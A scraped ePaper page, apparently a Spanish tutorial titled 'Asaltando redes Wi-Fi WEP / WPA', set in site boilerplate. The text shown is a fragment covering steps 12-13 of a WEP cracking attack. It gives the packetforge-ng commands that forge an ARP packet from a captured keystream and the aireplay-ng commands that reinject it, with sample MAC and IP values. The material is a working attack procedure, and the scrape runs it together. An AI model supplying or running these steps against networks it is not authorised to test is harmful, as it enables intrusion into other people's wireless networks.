12.07.2015 Views

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

Una vez veamos esto hemos completado este paso.12 – Al igual que con el ataque “chop chop” forjamos un nuevo paquete de datos:# packetforge-ng -0 -a -h -k -l -y -w en mi caso:# packetforge-ng -0 -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 -k 192.168.1.255 -l192.168.1.33 -y replay_dec-1206-155611.xor -w arpUna vez pongaWrote packet to: en mi caso:Wrote packet to: arpya hemos completado este paso.13 – Para acabar con este ataque hace falta reinyectar como con el ataque anterior:# aireplay-ng -2 -h -r en mi caso:# aireplay-ng -2 -h 00:11:22:33:44:55 -r arp mon09

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!